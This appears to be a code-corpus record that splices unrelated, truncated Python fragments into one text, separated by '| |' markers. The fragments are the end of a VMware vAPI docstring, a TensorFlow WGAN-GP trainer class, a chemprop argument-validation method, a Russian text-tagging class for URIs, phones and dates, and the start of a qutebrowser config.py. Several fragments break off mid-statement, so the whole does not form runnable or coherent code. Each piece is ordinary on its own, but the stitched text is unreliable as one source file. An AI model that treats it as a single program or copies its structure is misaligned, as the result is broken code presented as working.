:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'pool_id': | |
<reponame>rharish101/mnist-gan<gh_stars>1-10
"""Class for training the GAN."""
from pathlib import Path
from typing import Final, List, NamedTuple, Tuple
import tensorflow as tf
from tensorflow import Tensor, Variable
from tensorflow.data import Dataset
from tensorflow.distribute import ReduceOp, Strategy
from tensorflow.keras import Model
from tensorflow.keras.mixed_precision import LossScaleOptimizer
from tensorflow.keras.optimizers import Adam, Optimizer
from tensorflow.keras.optimizers.schedules import ExponentialDecay
from tqdm import tqdm
from ..evaluation import RunningFID
from ..utils import Config, get_grid, reduce_concat
class _Losses(NamedTuple):
"""Holds all the losses for logging.
Attributes:
wass: The Wasserstein loss
grad_pen: The Wasserstein gradient penalty
gen_reg: The regularization for the generator
crit_reg: The regularization for the generator
"""
wass: Tensor
grad_pen: Tensor
gen_reg: Tensor
crit_reg: Tensor
class GANTrainer:
"""Class to train a GAN.
Attributes:
GEN_PATH: The prefix for the file name of the generator's saved weights
CRIT_PATH: The prefix for the file name of the critic's saved weights
generator: The generator model being trained
critic: The critic model being trained
train_dataset: The dataset of real images and labels for training
val_dataset: The dataset of real images and labels for validation
gen_optim: The optimizer for the generator
crit_optim: The optimizer for the critic
evaluator: The object that calculates the running FID
writer: The summary writer to log TensorBoard summaries
config: The hyper-param config
save_dir: Directory where to store model weights
"""
GEN_PATH: Final = "generator.ckpt"
CRIT_PATH: Final = "critic.ckpt"
def __init__(
self,
generator: Model,
critic: Model,
classifier: Model,
strategy: Strategy,
train_dataset: Dataset,
val_dataset: Dataset,
config: Config,
log_dir: Path,
save_dir: Path,
):
"""Store main models and info required for training.
Args:
generator: The generator model to be trained
critic: The critic model to be trained
classifier: The trained classifier model for FID
strategy: The distribution strategy for training the GAN
train_dataset: The dataset of real images and labels for training
val_dataset: The dataset of real images and labels for validation
config: The hyper-param config
log_dir: Directory where to write event logs
save_dir: Directory where to store model weights
"""
self.generator = generator
self.critic = critic
self.strategy = strategy
self.mixed_precision = config.mixed_precision
self.train_dataset = train_dataset
self.val_dataset = val_dataset
with strategy.scope():
def get_lr_sched(lr):
return ExponentialDecay(
lr, config.decay_steps, config.decay_rate
)
self.gen_optim = Adam(get_lr_sched(config.gen_lr), 0.5)
self.crit_optim = Adam(get_lr_sched(config.crit_lr), 0.5)
if config.mixed_precision:
self.gen_optim = LossScaleOptimizer(self.gen_optim)
self.crit_optim = LossScaleOptimizer(self.crit_optim)
self.evaluator = RunningFID(classifier)
self.writer = tf.summary.create_file_writer(str(log_dir))
self.config = config
self.save_dir = save_dir
@tf.function
def _init_optim(self) -> None:
"""Initialize the optimizer variables.
This is needed because TensorFlow doesn't allow variable creation after
`tf.function`'s graph has been traced once. This is a workaround for
the TensorFlow issue here:
https://github.com/tensorflow/tensorflow/issues/27120
"""
def create_vars():
for model, optim in [
(self.generator, self.gen_optim),
(self.critic, self.crit_optim),
]:
# The optimizer will initialize its variables only on applying
# gradients. Therefore, we use zero grads.
grads_and_vars = [
(tf.zeros_like(var), var)
for var in model.trainable_variables
]
optim.apply_gradients(grads_and_vars)
self.strategy.run(create_vars, args=tuple())
def _get_losses(
self,
real: Tensor,
generated: Tensor,
labels: Tensor,
crit_real_out: Tensor,
crit_fake_out: Tensor,
) -> _Losses:
"""Get the dictionary of losses, as required by `log_summaries`."""
# Wasserstein distance
wass = tf.nn.compute_average_loss(
crit_real_out - crit_fake_out,
global_batch_size=self.config.gan_batch_size,
)
# Wasserstein Gradient Penalty
grad_pen = self._gradient_penalty(real, generated, labels)
# Regularization losses
# NOTE: Regularization needs to be scaled by the number of GPUs in
# the strategy, as gradients will be added.
gen_reg = tf.nn.scale_regularization_loss(sum(self.generator.losses))
crit_reg = tf.nn.scale_regularization_loss(sum(self.critic.losses))
return _Losses(wass, grad_pen, gen_reg, crit_reg)
def _gradient_penalty(
self, real: Tensor, generated: Tensor, labels: Tensor
) -> Tensor:
"""Return the Wasserstein Gradient Penalty loss.
The original paper can be found at: https://arxiv.org/abs/1704.00028
Args:
real: The input real images
generated: The corresponding generated images
labels: The corresponding input labels
Returns:
The gradient penalty loss
"""
with tf.GradientTape() as tape:
# U[0, 1] random value used for linear interpolation
gp_rand = tf.random.uniform(())
gp_inputs = real * gp_rand + generated * (1 - gp_rand)
# Forces the tape to track the inputs, which is needed for
# calculating gradients in the gradient penalty.
tape.watch(gp_inputs)
crit_gp_out = self.critic([gp_inputs, labels], training=True)
grads = tape.gradient(crit_gp_out, gp_inputs)
flat_grads = tf.reshape(grads, (grads.shape[0], -1))
norm = tf.norm(flat_grads, axis=1)
gp_batch = (norm - 1) ** 2
return tf.nn.compute_average_loss(
gp_batch, global_batch_size=self.config.gan_batch_size
)
def _optimize(
self,
train_vars: List[Variable],
loss: Tensor,
optim: Optimizer,
tape: tf.GradientTape,
) -> None:
"""Optimize the variables."""
if self.mixed_precision:
loss = optim.get_scaled_loss(loss)
grads = tape.gradient(loss, train_vars)
if self.mixed_precision:
grads = optim.get_unscaled_gradients(grads)
optim.apply_gradients(zip(grads, train_vars))
def _train_step_critic(
self, real: Tensor, generated: Tensor, labels: Tensor
) -> None:
"""Run a single training step for the critic on a single GPU."""
with tf.GradientTape() as crit_tape:
crit_real_out = self.critic([real, labels], training=True)
crit_fake_out = self.critic([generated, labels], training=True)
losses = self._get_losses(
real, generated, labels, crit_real_out, crit_fake_out
)
crit_loss = (
-losses.wass
+ losses.crit_reg
+ self.config.gp_weight * losses.grad_pen
)
self._optimize(
self.critic.trainable_variables,
crit_loss,
self.crit_optim,
crit_tape,
)
def _train_step(
self, real: Tensor, labels: Tensor
) -> Tuple[Tensor, _Losses]:
"""Run a single training step on a single GPU.
This training step will train the critic for the required number of
steps as well as train the generator for a single step.
Args:
real: The input real images
labels: The corresponding input labels
Returns:
The generated images
The dictionary of losses, as required by `log_summaries`
"""
noise = tf.random.normal((real.get_shape()[0], self.config.noise_dims))
with tf.GradientTape() as gen_tape:
generated = self.generator([noise, labels], training=True)
# No need to calculate gradients of critic optimization
with gen_tape.stop_recording():
for _ in range(self.config.crit_steps):
self._train_step_critic(real, generated, labels)
crit_real_out = self.critic([real, labels], training=True)
crit_fake_out = self.critic([generated, labels], training=True)
losses = self._get_losses(
real, generated, labels, crit_real_out, crit_fake_out
)
gen_loss = losses.wass + losses.gen_reg
self._optimize(
self.generator.trainable_variables,
gen_loss,
self.gen_optim,
gen_tape,
)
# Returned values are used for logging summaries
return generated, losses
@tf.function
def train_step(
self, real: Tensor, labels: Tensor
) -> Tuple[Tensor, _Losses]:
"""Run a single training step, distributing across all GPUs.
Args:
real: The input real images
labels: The corresponding input labels
Returns:
The generated images
The dictionary of losses, as required by `log_summaries`
"""
gen, losses = self.strategy.run(self._train_step, args=(real, labels))
gen = reduce_concat(self.strategy, gen)
# Sum losses across all GPUs
losses = [
self.strategy.reduce(ReduceOp.SUM, value, axis=None)
for value in losses
]
return gen, _Losses(*losses)
def _get_fid(self) -> Tensor:
"""Calculate FID over the validation dataset."""
self.evaluator.reset()
for real, lbls in self.val_dataset:
inputs = tf.random.normal((real.shape[0], self.config.noise_dims))
generated = self.generator([inputs, lbls])
self.evaluator.update(real, generated)
return self.evaluator.get_fid()
def log_summaries(
self,
real: Tensor,
generated: Tensor,
losses: _Losses,
global_step: int,
) -> None:
"""Log summaries to disk.
The dict of losses should have the following key-value pairs:
wass: The Wasserstein loss
grad_pen: The Wasserstein gradient penalty
gen_reg: The L2 regularization loss for the generator
crit_reg: The L2 regularization loss for the critic
Args:
real: The input real images
generated: The generated images
losses: The dictionary of losses
global_step: The current global training step
"""
with self.writer.as_default():
with tf.name_scope("losses"):
tf.summary.scalar(
"wasserstein_loss", losses.wass, step=global_step
)
tf.summary.scalar(
"gradient_penalty", losses.grad_pen, step=global_step
)
tf.summary.scalar(
"generator_regularization",
losses.gen_reg,
step=global_step,
)
tf.summary.scalar(
"critic_regularization",
losses.crit_reg,
step=global_step,
)
with tf.name_scope("metrics"):
fid = self._get_fid()
tf.summary.scalar("FID", fid, step=global_step)
# Save generated and real images in a square grid
with tf.name_scope("images"):
real_grid = get_grid(real)
gen_grid = get_grid(generated)
tf.summary.image("real", real_grid, step=global_step)
tf.summary.image("generated", gen_grid, step=global_step)
with tf.name_scope("generator"):
for var in self.generator.trainable_variables:
tf.summary.histogram(var.name, var, step=global_step)
with tf.name_scope("critic"):
for var in self.critic.trainable_variables:
tf.summary.histogram(var.name, var, step=global_step)
def save_models(self) -> None:
"""Save the models to disk."""
for model, file_name in [
(self.generator, self.GEN_PATH),
(self.critic, self.CRIT_PATH),
]:
model.save_weights(self.save_dir / file_name)
def train(
self, record_steps: int, save_steps: int, log_graph: bool = False
) -> None:
"""Execute the training loops for the GAN.
Args:
record_steps: Step interval for recording summaries
save_steps: Step interval for saving the model
log_graph: Whether to log the graph of the model
"""
# Total no. of batches in the training dataset
total_batches = self.train_dataset.cardinality().numpy()
dataset = self.strategy.experimental_distribute_dataset(
self.train_dataset
)
# Iterate over dataset in epochs
data_in_epochs = (
item for epoch in range(self.config.gan_epochs) for item in dataset
)
# Initialize all optimizer variables
self._init_optim()
for global_step, (real, lbls) in tqdm(
enumerate(data_in_epochs, 1),
total=self.config.gan_epochs * total_batches,
desc="Training",
):
# The graph must be exported the first time the tf.function is run,
# otherwise the graph is empty.
if global_step == 1 and log_graph:
tf.summary.trace_on()
gen, losses = self.train_step(real, lbls)
| |
splitting data into train/validation/test during cross-validation"""
return self._crossval_index_sets
@property
def task_names(self) -> List[str]:
"""A list of names of the tasks being trained on."""
return self._task_names
@task_names.setter
def task_names(self, task_names: List[str]) -> None:
self._task_names = task_names
@property
def num_tasks(self) -> int:
"""The number of tasks being trained on."""
return len(self.task_names) if self.task_names is not None else 0
@property
def features_size(self) -> int:
"""The dimensionality of the additional molecule-level features."""
return self._features_size
@features_size.setter
def features_size(self, features_size: int) -> None:
self._features_size = features_size
@property
def train_data_size(self) -> int:
"""The size of the training data set."""
return self._train_data_size
@train_data_size.setter
def train_data_size(self, train_data_size: int) -> None:
self._train_data_size = train_data_size
@property
def atom_descriptor_scaling(self) -> bool:
"""
Whether to apply normalization with a :class:`~chemprop.data.scaler.StandardScaler`
to the additional atom features."
"""
return not self.no_atom_descriptor_scaling
@property
def bond_feature_scaling(self) -> bool:
"""
Whether to apply normalization with a :class:`~chemprop.data.scaler.StandardScaler`
to the additional bond features."
"""
return not self.no_bond_features_scaling
def process_args(self) -> None:
super(TrainArgs, self).process_args()
global temp_save_dir # Prevents the temporary directory from being deleted upon function return
# Adapt the number of molecules for reaction_solvent mode
if self.reaction_solvent is True and self.number_of_molecules != 2:
raise ValueError('In reaction_solvent mode, --number_of_molecules 2 must be specified.')
# Process SMILES columns
self.smiles_columns = chemprop.data.utils.preprocess_smiles_columns(
path=self.data_path,
smiles_columns=self.smiles_columns,
number_of_molecules=self.number_of_molecules,
)
# Load config file
if self.config_path is not None:
with open(self.config_path) as f:
config = json.load(f)
for key, value in config.items():
setattr(self, key, value)
# Check whether the number of input columns is two for the reaction_solvent mode
if self.reaction_solvent is True and len(self.smiles_columns) != 2:
raise ValueError(f'In reaction_solvent mode, exactly two smiles column must be provided (one for reactions, and one for molecules)')
# Validate reaction/reaction_solvent mode
if self.reaction is True and self.reaction_solvent is True:
raise ValueError('Only reaction or reaction_solvent mode can be used, not both.')
# Create temporary directory as save directory if not provided
if self.save_dir is None:
temp_save_dir = TemporaryDirectory()
self.save_dir = temp_save_dir.name
# Fix ensemble size if loading checkpoints
if self.checkpoint_paths is not None and len(self.checkpoint_paths) > 0:
self.ensemble_size = len(self.checkpoint_paths)
# Process and validate metric and loss function
if self.metric is None:
if self.dataset_type == 'classification':
self.metric = 'auc'
elif self.dataset_type == 'multiclass':
self.metric = 'cross_entropy'
elif self.dataset_type == 'spectra':
self.metric = 'sid'
elif self.dataset_type == 'regression' and self.loss_function == 'bounded_mse':
self.metric = 'bounded_mse'
elif self.dataset_type == 'regression':
self.metric = 'rmse'
else:
raise ValueError(f'Dataset type {self.dataset_type} is not supported.')
if self.metric in self.extra_metrics:
raise ValueError(f'Metric {self.metric} is both the metric and is in extra_metrics. '
f'Please only include it once.')
for metric in self.metrics:
if not any([(self.dataset_type == 'classification' and metric in ['auc', 'prc-auc', 'accuracy', 'binary_cross_entropy', 'f1', 'mcc']),
(self.dataset_type == 'regression' and metric in ['rmse', 'mae', 'mse', 'r2', 'bounded_rmse', 'bounded_mae', 'bounded_mse']),
(self.dataset_type == 'multiclass' and metric in ['cross_entropy', 'accuracy', 'f1', 'mcc']),
(self.dataset_type == 'spectra' and metric in ['sid','wasserstein'])]):
raise ValueError(f'Metric "{metric}" invalid for dataset type "{self.dataset_type}".')
if self.loss_function is None:
if self.dataset_type == 'classification':
self.loss_function = 'binary_cross_entropy'
elif self.dataset_type == 'multiclass':
self.loss_function = 'cross_entropy'
elif self.dataset_type == 'spectra':
self.loss_function = 'sid'
elif self.dataset_type == 'regression':
self.loss_function = 'mse'
else:
raise ValueError(f'Default loss function not configured for dataset type {self.dataset_type}.')
if self.loss_function != 'bounded_mse' and any(metric in ['bounded_mse', 'bounded_rmse', 'bounded_mae'] for metric in self.metrics):
raise ValueError('Bounded metrics can only be used in conjunction with the regression loss function bounded_mse.')
# Validate class balance
if self.class_balance and self.dataset_type != 'classification':
raise ValueError('Class balance can only be applied if the dataset type is classification.')
# Validate features
if self.features_only and not (self.features_generator or self.features_path):
raise ValueError('When using features_only, a features_generator or features_path must be provided.')
# Handle FFN hidden size
if self.ffn_hidden_size is None:
self.ffn_hidden_size = self.hidden_size
# Handle MPN variants
if self.atom_messages and self.undirected:
raise ValueError('Undirected is unnecessary when using atom_messages '
'since atom_messages are by their nature undirected.')
# Validate split type settings
if not (self.split_type == 'predetermined') == (self.folds_file is not None) == (self.test_fold_index is not None):
raise ValueError('When using predetermined split type, must provide folds_file and test_fold_index.')
if not (self.split_type == 'crossval') == (self.crossval_index_dir is not None):
raise ValueError('When using crossval split type, must provide crossval_index_dir.')
if not (self.split_type in ['crossval', 'index_predetermined']) == (self.crossval_index_file is not None):
raise ValueError('When using crossval or index_predetermined split type, must provide crossval_index_file.')
if self.split_type in ['crossval', 'index_predetermined']:
with open(self.crossval_index_file, 'rb') as rf:
self._crossval_index_sets = pickle.load(rf)
self.num_folds = len(self.crossval_index_sets)
self.seed = 0
# Validate split size entry and set default values
if self.split_sizes is None:
if self.separate_val_path is None and self.separate_test_path is None: # separate data paths are not provided
self.split_sizes = (0.8, 0.1, 0.1)
elif self.separate_val_path is not None and self.separate_test_path is None: # separate val path only
self.split_sizes = (0.8, 0., 0.2)
elif self.separate_val_path is None and self.separate_test_path is not None: # separate test path only
self.split_sizes = (0.8, 0.2, 0.)
else: # both separate data paths are provided
self.split_sizes = (1., 0., 0.)
else:
if sum(self.split_sizes) != 1.:
raise ValueError(f'Provided split sizes of {self.split_sizes} do not sum to 1.')
if len(self.split_sizes) not in [2,3]:
raise ValueError(f'Three values should be provided for train/val/test split sizes. Instead received {len(self.split_sizes)} value(s).')
if self.separate_val_path is None and self.separate_test_path is None: # separate data paths are not provided
if len(self.split_sizes) != 3:
raise ValueError(f'Three values should be provided for train/val/test split sizes. Instead received {len(self.split_sizes)} value(s).')
if 0. in self.split_sizes:
raise ValueError(f'Provided split sizes must be nonzero if no separate data files are provided. Received split sizes of {self.split_sizes}.')
elif self.separate_val_path is not None and self.separate_test_path is None: # separate val path only
if len(self.split_sizes) == 2: # allow input of just 2 values
self.split_sizes = (self.split_sizes[0], 0., self.split_sizes[1])
if self.split_sizes[0] == 0.:
raise ValueError('Provided split size for train split must be nonzero.')
if self.split_sizes[1] != 0.:
raise ValueError('Provided split size for validation split must be 0 because validation set is provided separately.')
if self.split_sizes[2] == 0.:
raise ValueError('Provided split size for test split must be nonzero.')
elif self.separate_val_path is None and self.separate_test_path is not None: # separate test path only
if len(self.split_sizes) == 2: # allow input of just 2 values
self.split_sizes = (self.split_sizes[0], self.split_sizes[1], 0.)
if self.split_sizes[0] == 0.:
raise ValueError('Provided split size for train split must be nonzero.')
if self.split_sizes[1] == 0.:
raise ValueError('Provided split size for validation split must be nonzero.')
if self.split_sizes[2] != 0.:
raise ValueError('Provided split size for test split must be 0 because test set is provided separately.')
else: # both separate data paths are provided
if self.split_sizes != (1., 0., 0.):
raise ValueError(f'Separate data paths were provided for val and test splits. Split sizes should not also be provided.')
# Test settings
if self.test:
self.epochs = 0
# Validate features are provided for separate validation or test set for each of the kinds of additional features
for (features_argument, base_features_path, val_features_path, test_features_path) in [
('`--features_path`', self.features_path, self.separate_val_features_path, self.separate_test_features_path),
('`--phase_features_path`', self.phase_features_path, self.separate_val_phase_features_path, self.separate_test_phase_features_path),
('`--atom_descriptors_path`', self.atom_descriptors_path, self.separate_val_atom_descriptors_path, self.separate_test_atom_descriptors_path),
('`--bond_features_path`', self.bond_features_path, self.separate_val_bond_features_path, self.separate_test_bond_features_path)
]:
if base_features_path is not None:
if self.separate_val_path is not None and val_features_path is None:
raise ValueError(f'Additional features were provided using the argument {features_argument}. The same kinds of features must be provided for the separate validation set.')
if self.separate_test_path is not None and test_features_path is None:
raise ValueError(f'Additional features were provided using the argument {features_argument}. The same kinds of features must be provided for the separate test set.')
# validate extra atom descriptor options
if self.overwrite_default_atom_features and self.atom_descriptors != 'feature':
raise NotImplementedError('Overwriting of the default atom descriptors can only be used if the'
'provided atom descriptors are features.')
if not self.atom_descriptor_scaling and self.atom_descriptors is None:
raise ValueError('Atom descriptor scaling is only possible if additional atom features are provided.')
# validate extra bond feature options
if self.overwrite_default_bond_features and self.bond_features_path is None:
raise ValueError('If you want to overwrite the default bond descriptors, '
'a bond_descriptor_path must be provided.')
if not self.bond_feature_scaling and self.bond_features_path is None:
| |
str) else
pars,
start=par_no1
):
assert isinstance(text, str), \
"ERROR: text must be of 'str' type (line {})" \
.format(i)
if text:
pars_.append({'text': self.RE_LF2.sub(
r'\g<1> \g<2>', self.RE_LF.sub(r'\g<1> ', text)
).replace('\n', '. ').replace('\r', '')})
par_no2 += 1
return (par_no1, par_no2) if par_no2 >= par_no1 else (None, None)
def load_pars(self, path, encoding='utf-8-sig', eop=r'\n', doc_id=None):
"""Load a text, split it into paragraphs, and put to the document.
:param path: a name of a file in txt format
:param eop: param for ``text_to_pars()``
:param doc_id: id of the document. If None then new document will be
created
:type doc_id: str
:return: lower and higher numbers of paragraphs created
:rtype: tuple(int, int)
"""
res = (None, None)
print('Load corpus...', end=' ', file=LOG_FILE)
LOG_FILE.flush()
with open(path, mode='rt', encoding=encoding) as f:
res = self.new_pars(list(self.text_to_pars(f.read(), eop=eop)),
doc_id)
print('done.', file=LOG_FILE)
return res
@staticmethod
def text_to_pars(text, eop=r'\n'):
"""Just split a *text* into paragraphs by a given rule. Empty
paragraphs will be skipped.
:param text: text to split
:type text: str
:param eop: regex or function for splitting a *text*. If None then
all the *text* will be placed into one paragraph. Default
is LF symbol
:type eop: str|callable
:rtype: iter(list(str))
"""
return filter(bool, map(lambda x: x.strip(),#.replace('\u00A0', ' '),
eop(text) if callable(eop) else
re_split(eop, text))) if eop else \
[text]
def _unescape_html(self, text):
"""Convert html entities (>, >, &x3e;) to the corresponding
characters"""
#text = re_sub(r'(&[a-z]+;)', r' \g<1> ', text)
return unescape(text)
def _preprocess_emoji_default(self, text):
"""Depending on CHAR_DELIM symbol, replace emojis of type ":-\" to
":-/" (for '\\') or ":-|" to ":-!" (for '|')"""
return re_sub(r'(^|\s|' + self.CHAR_ALNUM
+ r')(:-?\\+)(\s|$)', r'\g<1>:-/\g<3>', text) \
if self.CHAR_DELIM == '\\' else \
re_sub(r'(^|\s|' + self.CHAR_ALNUM \
+ r')(:-?\|)(\s|$)', r'\g<1>:-!\g<3>', text) \
if self.CHAR_DELIM == '|' else \
text
def _remove_delims(self, text, sub=' '):
"""Remove a characters further using for a tagging from a *text*.
If *delim* is None, using a value set during ``__init__()``.
:param text: text to process
:type text: str
:param sub: substitute for a removing characters
:type sub: str
"""
return self._preprocess_emoji_default(text) \
.replace(self.CHAR_DELIM, sub)
def _tag_emoji(self, text):
"""NOTE: Some emojis may become corrupted after ``remove_delims()``.
You need to change them prior. For default *delim* symbol just run
``preprocess_emoji_default()`` before ``remove_delims()``
TODO: Need to add more complete emojis support"""
text = self.RE_EMOJI.sub(
lambda x:
(x.group(1) + ' ' + x.group(2) + self.TAG_EMOJI + ' '
+ x.group(3)
if x.group(2) else '')
+ (x.group(4) + x.group(5) + self.TAG_EMOJI + ' ' + x.group(6)
if x.group(5) else '')
+ (x.group(7) + ' ' + x.group(8) + self.TAG_EMOJI + ' '
+ x.group(9)
if x.group(8) else '')
+ (' ' + x.group(10) + self.TAG_EMOJI + ' '
if x.group(10) else '')
+ (x.group(11) + ' ' + x.group(12) + self.TAG_EMOJI + ' '
if x.group(12) else '')
+ (x.group(13) + x.group(14) + ' ' + x.group(15)
+ self.TAG_EMOJI + ' '
if x.group(15) else '')
+ (' ' + x.group(16) + self.TAG_EMOJI + ' ' + x.group(17)
+ x.group(18)
if x.group(16) else '')
+ (' yandex_' + x.group(19) + self.TAG_EMOJI
if x.group(19) else ''),
text
)
return text
def _tag_email(self, text):
text = self.RE_EMAIL.sub(r' \g<1>@\g<2>' + self.TAG_EMAIL + ' ', text)
return text
def _tag_xml(self, text):
text = self.RE_XML.sub(r' \g<1>\g<2>' + self.TAG_XML + ' ', text)
return text
def _tag_uri(self, text):
def process(match):
uri, garbage, scheme, scheme_tail, user_login, user_passwd, \
host, port, path, params, query, fragment = match.groups()
scnt = scheme.count(':') if scheme else -1
hcnt = host.count('.') if host else -1
isuri = (
scheme and (path or query)
) or (
# есть схема, а в хосте хотя бы одна точка, и при этом
# в домене хоста либо только латинские буквы, либо конкретные
# доменные зоны, либо хост - это ровно 4 числа (ip-адрес)
((scheme and hcnt >= 0) or hcnt >= 2) and re_search(r'''(?xiu)
^
(?:
(?:
(?: [ёа-я]+ [.-]? )? # head
# only ascii
(?: [0-9a-z][0-9a-z-]*\. )*
(?: [a-z][a-z-]+ ) # java errors included
# '{1,10}' instead of '+' for http uris
)|(?:
# known cyrillic zones
(?:
(?:
[0-9a-z][0-9a-z-]*
|
[0-9ёа-я][0-9ёа-я-]*
)
\.
)+
(?: бг | бел | рф | срб | укр ) # don't add 'ru'!
)
)
(?: [.-] [ёа-я]+ )? # tail
$
''', host)
) or (
# <scheme>://<ip-addr>
scheme and scheme_tail and hcnt == 3
and not re_search('[^0-9.]', host)
and reduce(lambda y, x: x >= 0 and x <= 255 and y,
map(int, re_findall(r'\b(\d{1,3})\b', host)), True)
) or (
# поддерживаем urn'ы
scnt >= 2 and host
)
# workaround for english names:
toks = match.group(0).split('.')
if re_match('(?:[A-Z]\.){1,4}[A-Z][A-Za-z]+', match.group(0)):
res = match.group(0).replace('.', '. ')
elif isuri:
head = tail = None
if host and not (scheme and user_login and user_passwd):
head = re_search('^([ёа-я]+[.-]?)[0-9a-z]', host)
if head:
head = head.group(1)
uri = uri[len(head):]
if path or params or query or fragment:
tail = re_search('(?i)([.,:;!()-]+[ёа-я]*)$', uri)
elif host:
tail = re_search(
'(?i)(?=(?!\.(?:бг|бел|рф|срб|укр)$))([.-][ёа-я]+)$',
uri
)
if tail:
tail = tail.group(1)
#uri = uri.rsplit(tail, 1)[0]
uri = uri[:-len(tail)]
if garbage:
uri = uri[len(garbage):]
res = (garbage if garbage else '') \
+ (head if head else '') \
+ ' ' + uri + self.TAG_URI + ' ' \
+ (tail if tail else '')
else:
res = match.group(0)
return res
text = self.RE_URI.sub(process, text)
return text
def _tag_phone(self, text):
def process(match):
pre, p1, p2, p3, p4, p5, post = match.groups()
if p1 not in ('', '+7', '7', '8'):
res = match.group(0)
else:
phone = p2 + p3 + p4 + p5
if len(phone) == 11 and phone[0] in ('7', '8'):
phone = phone[1:]
res = '{} +7{}{} '.format(pre, phone, self.TAG_PHONE) \
if len(phone) == 10 else match.group(0)
return res
text = self.RE_PHONE.sub(process, text)
return text
def _tag_date(self, text):
def process(match):
res = match.group(0)
d, m, y = int(match.group(1)), int(match.group(2)), match.group(3)
if len(y) == 2: y = '20' + y
y = int(y)
end = match.group(4)
try:
if y > 1900 and y < 2030:
res = ' ' + str(datetime.date(y, m, d)) + self.TAG_DATE + \
' ' + (end if end else '')
except ValueError:
pass
return res
text = self.RE_DATE.sub(process, text)
return text
def _tag_hashtag(self, text):
text = self.RE_HASHTAG.sub(
r'\g<1> \g<2>' + self.TAG_HASHTAG + ' ', text
)
return text
def _tag_nametag(self, text):
text = self.RE_NAMETAG.sub(
r'\g<1> \g<2>' + self.TAG_NAMETAG + ' ', text
)
return text
def _tag_quotation(self, text):
def process(match):
res = match.group(0)
for i in range(1, 12, 3):
q1 = match.group(i)
if q1:
q2, q3 = match.group(i + 1), match.group(i + 2)
res = q1 + self.TAG_QUOTATION_START + ' ' \
+ q2 + ' ' \
+ q3 + self.TAG_QUOTATION_END + ' '
break
return res
text = self.RE_QUOTATION.sub(process, text)
return text
def norm_punct(self, text, islf_eos=True, istab_eos=True,
ignore_case=False):
"""Some heuristics to normalize Russian punctuation. Use it for chat
or forum messages where illiterate people are prevail. If your content
is already correct, you don't need this method.
:param islf_eos: LF symbol marks end of sentence; replace to "."
:param istab_eos: TAB symbol marks end of sentence; replace to "."
:param ignore_case: do not consider character case during processing
"""
flags = re.I if ignore_case else 0
if islf_eos:
text = text.replace('\n', ' . ')
if istab_eos:
text = text.replace('\t', ' . ')
wform_isknown = self.wform_isknown
# ; -> .
text = text.replace(';', ' . ')
# пробелы между знаками препинания
_chars_punct = '([' + self.CHARS_PUNCT + '])'
_chars_punct += '\s+' + _chars_punct
text = re_sub(_chars_punct, r'\g<1>\g<2>', text)
text = re_sub(_chars_punct, r'\g<1>\g<2>', text) # sic!
# лишние запятые
text = re_sub(r',*([.!?]),*', r'\g<1>', text)
# необычные сочетания всяких символов - конец предложения
text = re_sub(r'---+|,,,+|~+|\'\'\'+|"""+|№№№+', r' . ', text)
# два символа - в один
text = text.replace(r'--', r' - ')
text = text.replace(r"''", r' " ')
text = text.replace(r'""', r' " ')
text = re_sub(r',,?', r' , ', | |
# Autogenerated config.py
#
# NOTE: config.py is intended for advanced users who are comfortable
# with manually migrating the config file on qutebrowser upgrades. If
# you prefer, you can also configure qutebrowser using the
# :set/:bind/:config-* commands without having to write a config.py
# file.
#
# Documentation:
# qute://help/configuring.html
# qute://help/settings.html
# Change the argument to True to still load settings configured via autoconfig.yml
config.load_autoconfig(False)
# Aliases for commands. The keys of the given dictionary are the
# aliases, while the values are the commands they map to.
# Type: Dict
c.aliases = {'w': 'session-save', 'q': 'quit', 'wq': 'quit --save'}
# Backend to use to display websites. qutebrowser supports two different
# web rendering engines / backends, QtWebEngine and QtWebKit (not
# recommended). QtWebEngine is Qt's official successor to QtWebKit, and
# both the default/recommended backend. It's based on a stripped-down
# Chromium and regularly updated with security fixes and new features by
# the Qt project: https://wiki.qt.io/QtWebEngine QtWebKit was
# qutebrowser's original backend when the project was started. However,
# support for QtWebKit was discontinued by the Qt project with Qt 5.6 in
# 2016. The development of QtWebKit was picked up in an official fork:
# https://github.com/qtwebkit/qtwebkit - however, the project seems to
# have stalled again. The latest release (5.212.0 Alpha 4) from March
# 2020 is based on a WebKit version from 2016, with many known security
# vulnerabilities. Additionally, there is no process isolation and
# sandboxing. Due to all those issues, while support for QtWebKit is
# still available in qutebrowser for now, using it is strongly
# discouraged.
# Type: String
# Valid values:
# - webengine: Use QtWebEngine (based on Chromium - recommended).
# - webkit: Use QtWebKit (based on WebKit, similar to Safari - many known security issues!).
c.backend = 'webengine'
# Always restore open sites when qutebrowser is reopened. Without this
# option set, `:wq` (`:quit --save`) needs to be used to save open tabs
# (and restore them), while quitting qutebrowser in any other way will
# not save/restore the session. By default, this will save to the
# session which was last loaded. This behavior can be customized via the
# `session.default_name` setting.
# Type: Bool
c.auto_save.session = True
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'chrome-devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'devtools://*')
# Default encoding to use for websites. The encoding must be a string
